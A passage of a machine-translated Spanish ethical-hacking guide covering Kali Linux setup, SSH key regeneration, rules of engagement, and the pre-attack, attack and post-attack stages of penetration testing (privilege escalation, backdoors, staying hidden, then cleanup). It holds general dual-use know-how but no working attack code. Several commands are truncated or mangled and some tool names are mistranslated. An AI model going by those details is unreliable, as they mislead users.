el siguiente comando: "dpkg --status nombre del paquete"
Y finalmente, para eliminar un paquete de Kali, debe ejecutar el siguiente comando; "sudo apt-
get remove name ÿ un-install package" Por supuesto, debe reemplazar el nombre del paquete
Puede echar un vistazo a ese archivo abriéndolo con el panel de hojas cada vez que ejecuta
su comando de actualización, Kali busca en el contenido de este archivo para realizar el
proceso de actualización.
Machine Translated by Google
Ahora es el momento de enumerar algunas herramientas importantes que podrían ser muy útiles
para usted como probador de penetración. La primera de la lista se llama aplicación de precarga.
Para instalar este paquete, ejecute el siguiente comando: “sudo apt-
La aplicación de precarga identifica los programas más utilizados por el usuario y precarga
archivos binarios y dependencias en la memoria para proporcionar un acceso más rápido.
Funciona automáticamente después del primer reinicio, después de la instalación.
La siguiente aplicación que debe tener en cuenta e instalar se llama "gnome-do". Si te gusta
ejecutar aplicaciones desde tu teclado, “gnome-do” es la herramienta adecuada para ti. El
comando que necesita para instalar esta herramienta es: "sudo apt-get install gnome-do"
Su próximo software en la lista es el "archivo apt". Esta es una herramienta de línea de comandos
para buscar dentro de los paquetes del sistema de empaquetado "apt". Le permite enumerar el
contenido de un paquete sin instalarlo ni recuperarlo. El comando que necesitas para instalarlo
es:
Una vez que haya instalado el paquete, también debe actualizarlo usando el comando: “
La siguiente aplicación que necesita instalar se llama "Scrub". Esta aplicación es un programa de
borrado seguro para compilar con los estándares gubernamentales. El comando que necesita para
instalar esta herramienta es: "sudo apt-get install scrub"
A continuación, debe instalar "Obturador". Shutter es una herramienta de captura de pantalla que
captura imágenes de su escritorio. El comando que necesita para instalar esta herramienta es:
El siguiente software que debe instalar se llama "Figlet". Este programa hará que su consola se vea
profesional al mostrar un mensaje personalizado, como el nombre de su empresa, por ejemplo. El
comando que necesita para instalar esta herramienta es:
A continuación, debe editar el "archivo bashrc", desplazándose hasta el final del archivo y escribiendo
"mensaje figlet". A continuación, guarde, cierre y reinicie su consola, y la próxima vez que vuelva a
iniciar sesión en su consola, lo primero que debería ver es el mensaje que ha proporcionado.
A continuación, debe conocer SSH, también conocido como configuración de Secure Shell. Kali
viene con claves SSH predeterminadas, pero antes de comenzar a usar SSH en Kali, es una buena
idea deshabilitar las claves predeterminadas y generar un conjunto de claves único. El proceso de
mover las claves originales y generar el nuevo conjunto de claves es el siguiente. Primero, abra su
consola y cambie el directorio a la carpeta SSH.
NOTA: Aquí hay algo de ayuda sobre cómo navegar dentro de los directorios;
A continuación, debe crear una carpeta de respaldo y debe mover las claves SSH a esa carpeta de
respaldo.
Machine Translated by Google
-v : Salida detallada.
Por último, debe generar el nuevo conjunto de claves, por lo tanto, use el siguiente comando:
A continuación, verá en los siguientes mensajes, que indican que se generaron sus claves
ssh:
A continuación, debe verificar los hash de la clave ssh con el siguiente comando:
“md5sum ssh_host_*”
Aquí el * representa sus nuevas claves, así que compare estos hashes usando los
siguientes comandos:
“cd default_kali_keys/”
"md5am*"
Después de regenerar los pares de claves SSH, puede iniciar el servicio SSH a través de
Machine Translated by Google
Una vez que haya iniciado SSH, si desea verificar que el servicio se está ejecutando,
realice una consulta "netstat". Desde la salida, debería ver que SSH ahora está
escuchando en el puerto 22.
Machine Translated by Google
Ya hemos discutido los conceptos básicos de Linux, específicamente Kali Linux, así como
qué software y hardware adicional podría necesitar como Ethical Hacker. Sin embargo, en
lugar de saltar directamente a la línea de comandos o la interfaz gráfica de usuario de Kali,
debe saber más sobre los procedimientos una vez que acepte un trabajo como hacker ético.
Primero, tenemos que entender por qué hacemos pruebas de penetración en primer lugar.
Puede parecer una pregunta obvia, pero aquí le daremos más detalles. A continuación,
hablaremos sobre los diferentes tipos de pruebas de penetración, pero no solo hay diferentes
tipos, sino también diferentes personas que también están involucradas y que debe tener en cuenta.
Luego, pasaremos por las tres etapas diferentes de las pruebas de penetración para que
comprenda completamente cuáles son. Veremos la etapa previa al ataque, en la que pasamos
mucho tiempo porque queremos establecer algunos parámetros, además de protegernos
legalmente.
Luego veremos la etapa 2 donde veremos las cosas que haremos durante el ataque. Luego,
veremos los pasos posteriores al ataque y hablaremos sobre los estándares que debe seguir.
Algunos de los estándares los realizan los fabricantes, y algunos de ellos son estándares
abiertos, por lo que deberá decidir cuál desea seguir en función de lo que está tratando de
lograr. Una vez que encuentre el estándar para usted, manténgalo.
Pero a la pregunta; "¿Por qué hacemos una prueba de penetración en primer lugar?" Bueno,
esta parece una pregunta fácil o pensaría que la respuesta es bastante sencilla, pero hay
algunas razones por las que hacemos pruebas de penetración.
Otra razón legítima por la que hacemos pruebas de penetración es para crear medidas de
seguridad. Dado que vamos tras la red, ¿no tiene sentido seguir adelante y descubrir o tal
vez rediseñar nuestros mecanismos de seguridad actuales?
Machine Translated by Google
Muchas personas sienten que la prueba de penetración está diseñada para señalar vulnerabilidades,
pero no solo señalaremos la vulnerabilidad, sino que también debemos resaltar los efectos que esa
debilidad o esa vulnerabilidad representan para la empresa.
Al completar una prueba de penetración, podemos entregar un informe completo con los detalles de
todo lo que hemos descubierto. También podría argumentar que las pruebas de penetración están
diseñadas no solo para mostrar las brechas en su modelo de seguridad, sino que también pueden
beneficiar la recuperación ante desastres y la planificación de la continuidad del negocio.
El objetivo es simular métodos que los atacantes maliciosos utilizarían para intentar obtener acceso
no autorizado a su red.
Otra forma en la que puede asegurarse de realizar una prueba de penetración decente es seguir una
metodología, y hablaremos sobre los métodos más adelante, pero desea concentrarse en uno,
porque la mayoría de los planes garantizarán que cubra todos sus bases
La documentación es otro factor vital de una prueba de penetración decente. Queremos asegurarnos
de que el cliente pueda entender de qué estamos hablando, y el evaluador de penetración debe
asegurarse de que esté disponible para responder cualquier pregunta que pueda surgir del informe
documentado de la prueba de penetración.
Otra forma de asegurarse de hacer una prueba de penetración decente es demostrar que tiene las
herramientas adecuadas. Algunas de estas herramientas serán propietarias, algunas de código
abierto, algunas de ellas harán cosas por usted automáticamente, otras pueden incluir scripts, así
como solo interfaces de línea de comandos estándar.
Otra forma de asegurarse de tener una prueba de penetración decente es elegir quién está
involucrado. Puede que no estés haciendo esto solo. Si lo está haciendo solo, quiere asegurarse de
que usted y todos los demás involucrados en la prueba de penetración sean un probador de
penetración legítimo que siga las reglas de los acuerdos de confidencialidad.
Esto es importante si lo contratan para hacer una prueba de penetración que podría destruir una
empresa. Es su trabajo, su responsabilidad y su integridad asegurarse de ayudar a proteger al cliente.
Machine Translated by Google
También desea asegurarse de que no solo señale lo que está mal, sino que cuando informe los hallazgos,
brinde algunas recomendaciones sobre lo que se debe hacer o lo que se podría hacer para solucionar el
problema.
Ofrecer soluciones todo el tiempo. Además de las cuatro razones principales para realizar una prueba
de penetración, hay un par de otras razones que también debe tener en cuenta.
Uno de ellos podría estar en el aspecto de tratar de idear los cambios que deben realizarse en su
infraestructura para que sea más seguro, ya sea relacionado con el hardware o el software, o incluso si
es el diseño de la red.
También podemos usar los resultados de las pruebas de penetración para crear pasos de preparación
para ayudar a prevenir que se produzcan explotaciones. Otra razón es observar la efectividad de las
máquinas de la red y luego evaluarlas, incluso si esas máquinas son firewalls, enrutadores, conmutadores,
servidores web, servidores de archivos.
También utilizaríamos los resultados de las pruebas de penetración para confirmar nuestras defensas de
seguridad y los controles que tenemos implementados. Por ejemplo, porque tuvo una prueba de
penetración hace 3 meses, eso no significa que algo más no haya cambiado en su red.
Del mismo modo, los resultados de las pruebas de penetración podrían beneficiarnos en la creación de
equipos o administración para ayudarnos a enfocarnos en vulnerabilidades particulares y problemas de
seguridad para capacitar a las personas que están a cargo de esos sistemas.
También utilizaríamos los resultados de las pruebas de penetración para ayudarnos a identificar las
amenazas a las que se enfrentan los activos de nuestra organización, y esto va a cambiar porque las
diferentes empresas pertenecen a una industria diferente.
Por ejemplo, los hospitales buscarán diferentes mecanismos de seguridad en comparación con una
pequeña empresa. Para reducir los gastos de la organización en seguridad de TI y mejorar el retorno de
la inversión o ROI cuando se trata de esos dispositivos de seguridad, debemos identificar y remediar las
vulnerabilidades y debilidades.
También podemos utilizar los resultados de las pruebas de penetración para crear políticas,
procedimientos, implementaciones y nuevos diseños. También podemos utilizar este tipo de informe
para ayudarnos a desarrollar sistemas, procesos, ejecuciones y planes para nuestra empresa.
Y no olvidemos que ciertas empresas tienen que preocuparse por regulaciones específicas. Por último,
generar las mejores prácticas para las regulaciones legales y de la industria; no hay nada peor que tener
una violación de datos y ser demandado
Machine Translated by Google
por una demanda colectiva de sus clientes porque no pudo demostrar que estaba tratando de
proteger sus datos.
Vas a leer muchos términos diferentes que se utilizan cuando se trata de diferentes tipos de
pruebas que se realizan, como una auditoría de seguridad o una evaluación de vulnerabilidades,
mientras todavía estamos hablando de pruebas de penetración.
Algunas personas pueden utilizar todos estos términos indistintamente, pero existen algunas
diferencias considerables, como una auditoría de seguridad que verifica si la empresa sigue
un conjunto de políticas y procedimientos de seguridad estándar.
El primero es conocido como equipo rojo. Un equipo rojo también se conoce como el equipo
agresor. Este es un equipo de hackers éticos que realizan pruebas de penetración en sus
sistemas con acceso limitado o nulo a la información interna de la organización.
recursos.
Los equipos rojos atacan con o sin previo aviso, y el equipo rojo puede incluir algunos
administradores de sistemas de diferentes departamentos dentro de la organización.
El otro tipo de equipo se conoce como el equipo azul. El equipo azul es un equipo defensivo.
El equipo azul tiene acceso a todos los recursos e información de la organización.
Su función principal es detectar e intentar mitigar las actividades del equipo rojo y anticipar
cómo podría ocurrir un ataque sorpresa. El equipo azul puede incluir algunos administradores
de sistemas y personal de TI estándar. Es el enfoque de evaluación menos costoso y más
frecuente.
Cuando se trata de los tipos de pruebas de penetración que existen, todo depende de su
enfoque y de la cantidad de información que tenga, o que le haya proporcionado el
Machine Translated by Google
Una prueba de pluma de caja blanca significa que tenemos un conocimiento completo de la
infraestructura, y cuando digo experiencia integral, el cliente o la empresa proporcionarán una topología
de red, incluidos todos los diagramas, inventarios de activos y sus inventarios de software.
Una empresa hará este tipo de prueba cuando quiera una auditoría completa de su seguridad. A pesar
de todo esto, la seguridad de la información es un proceso continuo, y las pruebas de penetración nos
brindan una instantánea de la postura de seguridad de esa empresa en ese momento dado.
Otro tipo de prueba es una prueba de caja negra. Esto se divide en dos tipos de pruebas. Uno se
conoce como una prueba ciega. En una prueba a ciegas, el evaluador de penetración no sabe nada
sobre la empresa o el objetivo, pero se informa al objetivo del alcance de la auditoría, es decir, qué,
cómo y cuándo realizará la prueba el evaluador.
En una prueba a ciegas, el atacante simulará las acciones, procesos y procedimientos que tomaría un
atacante real. Vamos a hacer algo de reconocimiento, algunas huellas, un poco de escaneo, y también
veremos alguna información disponible públicamente.
Las pruebas ciegas consumen más tiempo y son más caras debido al tiempo.
El otro tipo de prueba de caja negra se conoce como doble ciego.
Esto también se conoce como prueba de conocimiento cero, por lo que ni el evaluador de penetración
sabe sobre el objetivo, ni el objetivo está informado del alcance de la auditoría, por lo que no saben
qué ni cómo.
Esta es una de las evaluaciones más populares que se utilizan hoy en día debido al aspecto de que
pone a prueba el conocimiento de todos.
También tenemos algo llamado caja gris. Esta es una combinación de pruebas de caja negra y caja
blanca. Este tipo de prueba es cuando el atacante tiene un conocimiento parcial, como un nombre de
dominio de los servidores.
Estos ayudan a ahorrar algo de tiempo en comparación con la caja negra. Esto es solo un ahorro de
tiempo para nosotros porque en una caja negra, es solo cuestión de tiempo antes de que te reconozca
correctamente y llegue a esa zona gris.
lo que se conoce como una perspectiva dual, que ofrece una inspección completa del sistema tanto
desde la perspectiva del desarrollador como desde la perspectiva del atacante.
Por lo tanto, podemos atacar desde el exterior, así como simular un ataque interno
por parte de un empleado descontento. Hay un par de enfoques diferentes que
podría tomar.
La etapa uno de la prueba de penetración también se conoce como Compromiso previo, y esta etapa
se enfoca en recopilar la mayor cantidad de información posible sobre su objetivo. Esto se puede hacer
utilizando técnicas como el escaneo o la toma de huellas.
Debes establecer tus límites, y eso es lo primero que quieres que se te ocurra, pero al igual que en el
ejército, existen reglas de enfrentamiento. Por ejemplo, al personal militar no se le permite disparar, a
menos que le disparen.
El hecho de que vean a alguien con un arma no significa que puedan seguir adelante y disparar. Todo
depende de la guerra en la que estén. Cada uno tendría sus propias reglas de enfrentamiento, y eso
es lo mismo aquí.
Está creando un permiso formal para realizar la prueba de penetración y, en las reglas de participación,
puede especificar si realiza o no actividades técnicas o no técnicas.
Algunos elementos de reglas de compromiso quieren incluir el rango de direcciones IP que puede
probar. Usted no se sale de ese rango ni de los horarios en que realiza la prueba durante el horario
comercial, ni fuera del horario comercial.
Usted puede estar pensando; "¿La prueba de penetración podría tener lugar en cualquier momento?"
Bueno, sí, pero todo depende de si estuviera haciendo una simulación de un ataque de caja gris desde
adentro, por ejemplo, porque eso podría hacerse estrictamente durante el horario comercial.
También desea tener una lista de hosts que el cliente o el departamento pueden considerar restringidos.
Si ve una dirección IP que no está en su lista, ¡no la toque!
También enumerará los métodos de prueba aceptables, como ingeniería social, ataque de denegación
de servicio, qué herramientas se utilizarán, descifradores de contraseñas, rastreadores de red, etc.
Si va a utilizar la herramienta llamada "Nmap", por ejemplo, ¿será un escaneo Nmap agresivo o un
escaneo Nmap privado? También debe especificar la duración de la prueba.
Dependiendo de la prueba en sí o de lo que hayas acordado; algunas pruebas de pluma pueden tomar
Machine Translated by Google
hasta dos o tres meses para lograrlo. Del mismo modo, cualquiera que esté en el equipo de
penetración podría tener un punto de contacto si hay algún tipo de emergencia.
También desea enumerar algunas medidas para evitar que se llame a las fuerzas del orden público
con falsas alarmas que puede generar la prueba, especialmente si se trata de una prueba física.
Sus reglas de compromiso también deben incluir cómo manejar la información que ha recopilado.
Uno de los requisitos previos que debe tener cuando realiza una prueba de penetración para una
empresa es que le proporcionen una computadora portátil.
No es una computadora portátil que pueda conservar, pero es una computadora portátil que puede usar
durante la prueba de penetración, incluidos los informes.
Una vez que haya terminado con la prueba de penetración, les devuelve la computadora portátil con
instrucciones, y quieren guardar esa computadora portátil para posibles pruebas de penetración
futuras como seguimiento.
Por lo tanto, también puede aconsejar a su cliente que extraiga los discos duros de la computadora
y almacene solo esos, y asegúrese de que los datos se almacenen en una ubicación extremadamente
segura.
Vas a tener una lista de lo que requiere el cliente y la información que recopilas durante el proceso
de la entrevista para que puedas asegurarte de abordarlos en última instancia.
Revisará con el cliente o el departamento lo que debe probarse, como servidores, estaciones de
trabajo, enrutadores, firewalls, dispositivos de red, bases de datos, aplicaciones, seguridad física,
telecomunicaciones, sistemas de voz, etc.
en.
También tendrá que crear una lista de verificación de requisitos. Es decir, lo que el cliente requiere
que hagas con esas pruebas en particular. También hay que especificar los sectores a probar y
organizar a los usuarios.
Por ejemplo, es posible que solo necesite buscar departamentos específicos, como el departamento
de TI. Vas a notificar a la gente de esos departamentos que algo podría estar pasando dentro de la
próxima semana más o menos.
Machine Translated by Google
También deberá identificar sus plazos, pero debe asegurarse de que sea el plazo que requiere
el cliente. No es lo que crees que es mejor, a menos que te estén pidiendo un consejo.
Bueno, deberá asegurarse de que toda la información esté respaldada de forma segura antes
de comenzar a hacer cualquier cosa, porque algunas cosas que podría hacer podrían modificar
los archivos originales.
También deberá decidir el formato que utilizará para sus informes. ¿Se hace en un documento
estándar de Word? ¿Lo necesitan en PDF?
¿Qué información deben ver? ¿Debe mostrarse según quién esté mirando el informe?
Por ejemplo, tal vez el gerente del departamento de TI no quiera ver todos los detalles de lo
que sucedió. Solo necesita ver las cosas de las que debe encargarse y quién está involucrado
en la entrega del informe.
Hay que ser cauteloso aquí porque muchas veces al atacar el trabajo de un profesional de TI
y presentar el informe de una manera que es constructiva, en lugar de burlarse y es una forma
genuina.
El profesional de seguridad que entrega este informe debe ser consciente de que podría surgir
algo de odio, y le guste o no, siempre debe informar todo.
Para llevar un registro de todo esto, hay que empezar a hacer listas. Aquí hay algunas cosas
que puede incluir en su lista de verificación; el diseño de la red o las subredes, qué rangos
están usando, mire la seguridad física tanto de los servidores como de los dispositivos de red,
pero también del edificio en sí.
Por ejemplo, ¿puede alguien entrar en la oficina y encontrar un conector RJ45 vacío? Además,
no olvide, no solo con el diseño de la red, sino que asegúrese de aprender ambos; las
direcciones IP externas e internas.
Si está realizando una prueba de penetración y tienen cinco o menos servidores, por ejemplo,
servidores Windows o Linux, ¿debería revisar más servidores y, de ser así, cuántos de cada
tipo?
También debe asegurarse de que puede identificarlos. ¿El cliente requiere una evaluación de
las redes inalámbricas o sus sistemas analógicos, así como de sus máquinas móviles,
especialmente si la organización implementa una fuerza de trabajo móvil?
¿Qué pasa con las aplicaciones y servicios web que ofrece el cliente? Si ese cliente tiene un
sitio web frontal, ¿tiene enlaces de redirección para visitar otros sitios o extraer contenido de
otras fuentes en su sitio?
Algunos ataques notables de malware y ransomware actualmente son causados por las redes
publicitarias. Estas son redes que proporcionan anuncios. Estas son redes publicitarias que
legitiman sitios, pero las personas simplemente se suscriben a ellos, y un atacante malicioso
crea un anuncio, y es solo HTML con una mezcla de JavaScript, que no es más que un espacio
de compra dentro de una red publicitaria.
Estas redes publicitarias son utilizadas por cientos de sitios web, y las personas no tienen idea
de que podrían estar ofreciendo códigos maliciosos cuando visita esos sitios.
Hay una cosa por la que quiere estar preocupado, y es algo que quiere explicarle al cliente. Si la
prueba de penetración demora un tiempo, durante ese período de tiempo, los cambios pueden
incorporarse a su red sin que los evaluadores de penetración lo sepan y, por lo general, el cliente
no comprende el impacto de esos cambios.
Algunos de estos cambios incluyen cambios en los procesos comerciales o cambios técnicos,
como si la empresa cambia de ubicación. Además, si hay alguna aplicación que podría haber
cambiado. Aquí, no estoy hablando de actualizaciones de una aplicación existente, sino que me
refiero a cambiar a aplicaciones completamente diferentes.
El equipo de prueba debe verificar la seguridad y el cumplimiento de la aplicación del lado del
cliente, así como la seguridad del lado del cliente al lado del servidor, a medida que los datos se
transmiten del cliente al servidor.
¿Cómo se protege ese tráfico? Dado que ha realizado la verificación del tráfico del cliente al
servidor, también desea observar la seguridad del lado del servidor. Por lo tanto, mirará a ambos;
aplicaciones web y las propias aplicaciones que se ejecutan en busca de fallas.
En el ámbito, tendrá que implementar métodos de ingeniería social para tratar de ver si también
puede recopilar algunas contraseñas o detalles del proyecto. El alcance también debe incluir la
documentación de la seguridad existente.
Además, ¿quiere pensar de qué manera los empleados destruyen los documentos que ya no se
usan? Una cosa que debe enfatizar es el uso de dispositivos de trituración.
Machine Translated by Google
También debe verificar si hay empleados insatisfechos que puedan divulgar datos
confidenciales o llevárselos a un competidor. Una de las otras grandes cosas que puede
revisar con el cliente es sabotear la confusión del intruso.
Muchas veces, las empresas implementarán estrategias como un tarro de miel para
confundir o incluso engañar a los intrusos. Terminan gastando su tiempo pensando que
ese tarro de miel en particular es genuino.
A continuación, hay que mirar los contratos. Aquí, desea asegurarse de que sus
documentos incluirán su acuerdo de no divulgación. Esto es para asegurar que protege
la información de la empresa.
También debes tener claro los honorarios y los plazos, sobre todo si el proyecto va más
allá del plazo estimado porque podrías encontrarte con algo que no estaba previsto.
También debe incluir un contrato de información confidencial. Aquí será donde incluya
información comercial secreta, información de la red, información del sistema telefónico,
datos del cliente u otros materiales comerciales.
Este tipo de información se proporciona al pen-tester, y esta es otra razón por la que
mencioné anteriormente que recomiendo que la empresa le proporcione una computadora
portátil que sea de su propiedad, para que no tengan que preocuparse de que usted tome
Machine Translated by Google
El contrato también debe mencionar que no revelará ni dará copias a ningún tercero o competidor.
Esto ayuda a establecer un nivel de confianza entre usted y la empresa porque está a punto de
atacarlos y ver si puede robar información.
Podría estar haciendo un poco de Google sobre la empresa o cualquier cosa que no sea
demasiado agresiva. O bien, también podría hacer lo contrario mediante una vigilancia activa
agresiva.
También debe hacer algunos perfiles web. La creación de perfiles web significa que puede
obtener una estructura de directorio de los servidores web o servidores FTP, y catalogar todos
los formularios basados en web, los tipos de entrada de usuario que se permiten y los destinos
de envío de formularios.
Pero también debe catalogar los mensajes de error que aparecen porque eso puede ayudar a
identificar enlaces y aplicaciones de terceros. Como ves la lista es larga y pasas mucho tiempo
en esta etapa en particular y eso es porque esto es lo que ayuda a cubrir ambas; usted mismo y
el cliente, por lo que hay un nivel de expectativa que debe cumplirse.
Machine Translated by Google
Pen testing La etapa 2 es la etapa de ataque. Toda la información que recopila durante la etapa previa
al ataque lo ayuda a idear una estrategia de ataque completa.
La etapa de ataque implica comprometer el objetivo.
Puede intentar explotar una vulnerabilidad que descubrió durante la etapa previa al ataque o incluso
utilizar algunas lagunas como políticas de seguridad débiles o políticas de contraseña para intentar
obtener acceso al sistema.
Es importante tener en cuenta que el atacante solo debe preocuparse por un puerto de entrada o un
mecanismo para ingresar, por lo tanto, el cliente o la empresa deben preocuparse por cubrir todas sus
bases.
En lugar de ser pasivo, necesitas volverte activo. Una vez que finalice el contrato y tenga permiso
para participar, primero debe intentar penetrar el perímetro observando las máquinas que están
expuestas externamente y cómo reaccionan.
Luego, debe ver cómo enumerar esos objetivos después de haber ingresado. En caso de que sepa
cuál es el objetivo, será más fácil tratar de alcanzar el objetivo.
Después de alcanzar el objetivo, lo siguiente que debe hacer es poder escalar sus privilegios, para
que pueda hacer más con ese sistema en particular. Finalmente, deberá asegurarse de poder volver
al sistema ejecutando, implantando y retractando, utilizando rootkits.
Entremos en detalles sobre cómo harías cada uno de estos elementos. La forma principal de probar
el perímetro es ir tras el propio cortafuegos, y lo hará enviando y elaborando algunos paquetes para
comprobar cómo reacciona el cortafuegos.
Esto se puede hacer observando cómo el cortafuegos maneja la fragmentación, los fragmentos
superpuestos, las inundaciones de paquetes.
También puede hacer esto creando algunos paquetes para que pueda verificar las Listas de acceso o
ACL del firewall, como lo que está permitido y lo que no.
Técnicamente, lo que está permitido y lo que está prohibido. También debería echar un vistazo a
cómo se filtran los protocolos intentando conectarse a varios protocolos, como SSH, FTP o incluso
Telnet.
Machine Translated by Google
También debe intentar medir los umbrales para diferentes ataques de denegación de servicio
al intentar enviar conexiones TCP persistentes y ver cómo lo maneja el firewall, o incluso
intentar transmitir conexiones UDP.
Al hacer esto, aprenderá cuáles son los umbrales establecidos en el firewall. También debe
intentar enviar algunas URL con formato incorrecto para ver cómo responde el IDS.
También puede intentar ver cómo responden los servicios web a algunas solicitudes, como
publicar solicitudes, eliminar solicitudes o copiar solicitudes. A continuación, debe ir después
de enumerar las máquinas.
Pero algunos de esos perímetros que descubrirá podrían ser cosas como: cuál es la
identificación de la máquina o cuál es la descripción de la máquina, y esto lo ayudará a
identificar dónde se encuentran físicamente las máquinas.
Esto se debe a que conoce todo en la red o al menos una parte decente. Según lo que haya
descubierto, puede ir tras esas vulnerabilidades.
Algunas formas en que puede obtener más información sobre el objetivo es realizar ataques
de sondeo. Lo que esto significa es que apuntará a las máquinas que descubrió con
diferentes tipos de ataques para ver cuáles son vulnerables.
Por lo tanto, debe ejecutar análisis de vulnerabilidades. También debe adquirir el objetivo
haciendo algo básico como usar lo que se conoce como sistemas confiables.
Esto implica intentar acceder a los recursos del dispositivo a través de la información que ha
obtenido de forma legítima a través de ataques de ingeniería social.
Una vez que haya adquirido el objetivo, su siguiente paso es escalar los privilegios.
A veces, esta escalada es realizada por el atacante, por lo que para lograr esto, usted,
como evaluador de penetración, debe intentar aprovechar los errores y fallas en el diseño
del sistema operativo o las aplicaciones.
Los atacantes normalmente realizan la escalada de privilegios para llevar a cabo diferentes
tipos de actividades, como eliminar archivos, buscar información confidencial o instalar
programas que pueden ayudarlos a volver a entrar más tarde, como un troyano o un virus.
Estos técnicamente llamados puertas traseras. Algunas formas en que puede escalar sus
privilegios incluyen políticas de seguridad deficientes o aprovechar los correos electrónicos
o la codificación del sitio web que no se ha probado para ver si puede recopilar la
información que podría conducir a una escalada de privilegios.
También puedes hacerlo mediante un ataque de fuerza bruta. La fuerza bruta consume
más tiempo y existen numerosas herramientas, como descifradores de contraseñas,
troyanos o incluso ingeniería social.
La ingeniería social es una de las formas más fáciles y preferidas para que los atacantes
ingresen porque es difícil de rastrear. Después de escalar los privilegios de una cuenta, lo
siguiente que debe hacer es intentar ejecutar, implementar y
retraer.
Usted, como pen-tester, también debe asegurarse de que puede cambiar la configuración
del sistema y permanecer oculto. Así que quieres ver si eres capaz de ser detectado
O no.
Una vez que haya hecho todo eso, debe asegurarse de que puede volver a ingresar a
través de su puerta trasera y ver si hay alertas, como alertas por correo electrónico, que
los ingenieros podrían haber recibido o advertido.
Machine Translated by Google
Si crees que los pasos previos al ataque o los pasos reales del ataque son los más
importantes, técnicamente eso no es cierto. Los pasos más críticos están en la etapa
posterior al ataque porque lo estás haciendo desde un punto de vista ofensivo.
No solo haces un lío y te vas. Por lo tanto, debe eliminar cualquier archivo que haya subido,
cualquier dato en el que realice modificaciones; se asegurará de restaurarlos, así como
cualquier configuración que haya cambiado.
Esta es también una de las razones por las que es vital documentar cada paso del camino.
También debe deshacer cualquier privilegio o configuración de usuario si ha realizado una
escalada de privilegios.
A veces, incluso puede crear diferentes recursos compartidos y conexiones, por lo que
debe deshacerlos, y también deberá asegurarse de documentar todos los registros que se
capturaron, así como las entradas que se modificaron.
Después de eso, tendrás que analizar los resultados y, en lugar de crear problemas, debes
desarrollar soluciones. Una vez que haya hecho todo eso, debe presentar esa
documentación a su cliente, mientras que debe identificar el sistema crítico y los recursos
críticos que están en riesgo, y elaborar una lista priorizada de lo que debe modificarse
primero.
Machine Translated by Google
Las diferentes formas en que realiza las pruebas de penetración dependerán de la metodología que
decida utilizar. Hay muchos estándares por ahí. Vamos a cubrir algunos de ellos, para que pueda
saber cuál se adapta mejor a usted.
Comencemos primero con OSSTMM, que significa Manual de metodología de prueba de seguridad de
código abierto. Este conjunto estándar de pruebas de penetración está tratando de lograr una matriz
de alta seguridad.
En resumen, se considera que este es el estándar para algunos de los niveles más altos de prueba.
Hay otro llamado OWASP, que significa Open Web Application Security Project.
OWASP es una metodología de código abierto, incluye numerosas herramientas que pueden ayudarlo
mucho, y también tiene una base de conocimiento, así como una herramienta que se llama ZAPP o
Zed Attack Proxy Project.
ZAPP es una herramienta que puede ayudarte automáticamente a encontrar vulnerabilidades en las
aplicaciones web. ZAPP está diseñado para desarrolladores web, pero los pen-testers también pueden
usar esta herramienta.
También hay otro marco llamado ISSAF, que es el marco de evaluación de la seguridad del sistema
de información. ISSAF también es un proyecto de código abierto sobre cómo realizar una prueba de
penetración. La ISSAF cuenta con el apoyo de un grupo denominado grupo de seguridad del sistema
de información pública.
Otro estándar que debe mirar se llama NIST, que significa Instituto Nacional de Estándares y
Tecnología. Cuando se trata de NIST, debe saber que la agencia federal de tecnología trabaja con la
industria para desarrollar y aplicar tecnologías, medidas y estándares.
También tenemos LPT, que significa Probador de penetración de licencias del EC-Council. Esta es una
metodología propietaria, y hay otra de McAfee, que se llama Foundstone y también tiene ISS, que la
hace IBM.
Cuando se trata de IBM, ellos hacen las pruebas por usted. También tenían un producto basado en la
firma llamado Proventia, que ahora está descontinuado. Este era un dispositivo de seguridad
multifunción y ofrecía numerosos servicios diferentes para ayudar a asegurar o probar su entorno de
red.
Machine Translated by Google
Debe realizar un curso, pasar por un proceso de solicitud, que incluye una tarifa de $ 900, y
le brindarán acceso al entorno Aspen de EC-Council.
Realizan una prueba de penetración en un entorno de prueba y tienen 30 días para enviar su
informe al Consejo de la CE. Con cada uno de estos, ya sea el código abierto o las versiones
propietarias de estas metodologías, todos ellos son similares entre sí.
Cada uno de los métodos te ayudará a cubrir todas tus bases. Todos comienzan con una
etapa de recopilación de información, de la que hemos hablado anteriormente.
Luego, debe pasar por una prueba de penetración externa y está buscando vulnerabilidades
a las que se pueda acceder desde el exterior. A continuación, vería un análisis de
vulnerabilidad para poder encontrar puntos débiles basados en software, sistemas operativos
o máquinas.
Después de eso, haría una prueba de penetración de la red interna para ver qué tipo de
información está expuesta desde adentro. Luego pasa por la prueba abierta del firewall.
Esta es su principal línea de defensa del mundo exterior, pero también haría pruebas desde
la DMZ. Como nota al margen, DMZ significa Zona desmilitarizada, a veces denominada red
perimetral o subred filtrada.
A continuación, debe verificar que el IDS esté haciendo lo que se supone que debe hacer,
que detecta intrusiones. Como pen-tester, buscará si alguna vulnerabilidad le permitiría al
atacante eludir la configuración de las alarmas que están configuradas en estos sistemas.
Luego, los métodos de descifrado de contraseñas se pueden usar para identificar las
debilidades asociadas con la administración de contraseñas. Esto le ayuda a asegurarse de
que no es propenso a ataques de fuerza bruta, ataques híbridos o ataques de diccionario.
Machine Translated by Google
También tendrá que cubrirse mirando las pruebas de penetración de aplicaciones web.
Vas a estar buscando vulnerabilidades relacionadas con el código o de back-end.
Lo más probable es que algunas pruebas más famosas incluyan la prueba de penetración de SQL.
La inyección de SQL sigue siendo dominante hoy en día. Aprovecha las variables de
entrada no validadas que se transmiten mediante comandos SQL a través de la
aplicación web que se ejecuta en la base de datos de back-end.
Dependiendo de dónde coloque sus enrutadores dentro de su red y conmutadores,
reenvían paquetes de datos de un punto a otro, a veces dentro y otras veces fuera de
su sistema.
Por ejemplo, el equipo de pruebas de penetración puede intentar tomar equipos móviles y
realizar pruebas fuera de línea para obtener acceso a la información almacenada en esas
máquinas fuera de línea.
Si puede conseguir a alguien del departamento de TI o alguien de la alta gerencia, bueno, esas
personas tienen más permisos o acceso a más sistemas que el resto de los empleados.
También debe mirar las pruebas de penetración del código fuente. En la actualidad, muchas
empresas utilizan aplicaciones creadas internamente y, a veces, estas aplicaciones ni siquiera
se consideran parte de la plataforma de seguridad.
Como pen-tester, verá el código fuente manualmente o existen numerosas herramientas que
podrían ayudarlo, como Zappit.
En este tipo de prueba, el equipo de prueba intentará obtener acceso a las instalaciones antes,
durante y después del horario comercial, pero no debe hacer nada destructivo.
Por ejemplo, usted no rompe las ventanas, pero si puede forzar la cerradura con facilidad, o
puede desarmar la puerta o saltar los torniquetes, está bien para muchas compañías.
Algunas empresas tienen un poco de miedo de que se realice ese tipo de prueba, por lo que
